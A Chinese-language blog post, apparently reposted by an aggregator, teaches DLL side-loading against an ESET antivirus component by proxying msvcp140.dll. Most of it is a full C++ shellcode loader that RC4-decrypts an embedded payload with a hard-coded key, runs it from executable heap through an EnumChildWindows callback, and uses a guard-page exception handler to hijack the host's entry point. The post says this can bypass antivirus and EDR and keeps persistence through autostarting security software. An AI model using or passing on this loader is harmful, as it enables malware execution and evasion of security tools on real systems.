一種應用更廣泛的DLL側載方法

• 1.尋找劫持對象
• 2.dll側載

1.尋找劫持對象

使用ProcessMonitor查看目標程序加載dll情況
這里側載的對象是eset 32的一個模塊ecmds，側載的dll為msvcp140.dll

可以看到堆棧的情況，并沒有調用LoadLibrary函數的情況，該dll加載先于程序的入口點，原始程序加載完dll運行一段時間就會退出，因此可以在msvcp140.dll被加載后將程序入口點patch阻斷原始程序的運行流程

2.dll側載

使用SharpDllProxy將msvcp140.dll的導出函數導出到文件中，該工具會生成一個.c的文件和一個dll，這個dll就是原始的msvcp140.dll

將上面導出的函數替換到下面代碼的位置，然后編譯生成dll文件，將該dll文件重命名為msvcp140.dll

// dllmain.cpp : 定義 DLL 應用程序的入口點。 #include "pch.h"#使用SharpDllProxy到處的原始dll的導出函數HANDLE threadHandle = NULL; PVOID pmem; PVOID addr; PBYTE loaderEntryPoint; DWORD lpflOldProtect; DWORD lpflOldProtect1;unsigned char shellcode[] = {}; unsigned int len = 894;BOOL DecryptShellcode() {BOOL bSuccess = TRUE;HCRYPTKEY hCryptoKey;HCRYPTHASH hCryptHash;HCRYPTPROV hCryptoProv;DWORD dwLen = 10;unsigned char pbKey[] = "qwe123qaz?";bSuccess = CryptAcquireContextW(&hCryptoProv, NULL, L"Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT);if (!bSuccess){goto CLEANUP;}bSuccess = CryptCreateHash(hCryptoProv, ((4 << 13 | (0) | 12)), 0, 0, &hCryptHash);if (!bSuccess){goto CLEANUP;}bSuccess = CryptHashData(hCryptHash, pbKey, dwLen, 0);if (!bSuccess){goto CLEANUP;}bSuccess = CryptDeriveKey(hCryptoProv, CALG_RC4, hCryptHash, 0, &hCryptoKey);if (!bSuccess){goto CLEANUP;}bSuccess = CryptDecrypt(hCryptoKey, NULL, FALSE, 0, (BYTE*)shellcode, (PDWORD)&len);if (!bSuccess){goto CLEANUP;}goto CLEANUP;CLEANUP:CryptReleaseContext(hCryptoProv, 0);CryptDestroyKey(hCryptoKey);CryptDestroyHash(hCryptHash);return bSuccess; }VOID ExecuteShellcode() {DecryptShellcode();HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);pmem = (PBYTE)HeapAlloc(hHep, 0, len);memcpy(pmem, shellcode, len);EnumChildWindows((HWND)NULL, (WNDENUMPROC)pmem, NULL);}LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo) {//if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint)if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_GUARD_PAGE) {if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint) {//ExecuteShellcode();VirtualProtect(loaderEntryPoint, 1, lpflOldProtect, &lpflOldProtect);//VirtualProtect(Sleep, 1, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect1);WaitForSingleObjectEx(threadHandle, INFINITE, TRUE);return EXCEPTION_CONTINUE_EXECUTION;}}return EXCEPTION_CONTINUE_SEARCH; }VOID Patch() {HMODULE loaderImage = GetModuleHandleA(NULL);DWORD len = 1;loaderEntryPoint = (PBYTE)loaderImage + *(DWORD*)((PBYTE)loaderImage + *((DWORD*)loaderImage + 15) + 40);//addr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");VirtualProtect(loaderEntryPoint, 1, PAGE_EXECUTE_READ|PAGE_GUARD, &lpflOldProtect);//_NtProtectVirtualMemory(hProc, (PVOID*)&loaderEntryPoint, (PSIZE_T)&len, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect);//ExecuteShellcode();//*(loaderEntryPoint) = 0xcc;AddVectoredExceptionHandler(0, &VEH); }BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecuteShellcode, NULL, 0, NULL);Patch();case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE; }

將ecmds和tmpBC2E.dll以及msvcp140.dll放在同一目錄運行，BOOM！

對edr或者殺軟的組件進行側載會有意想不到的效果，可能會繞過某些殺軟的防護
一般的，edr或者殺軟都會開機啟動，因此對這類程序的dll劫持也能夠起到很好的權限維持效果

總結

以上是生活随笔為你收集整理的一种应用更广泛的DLL侧载方法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。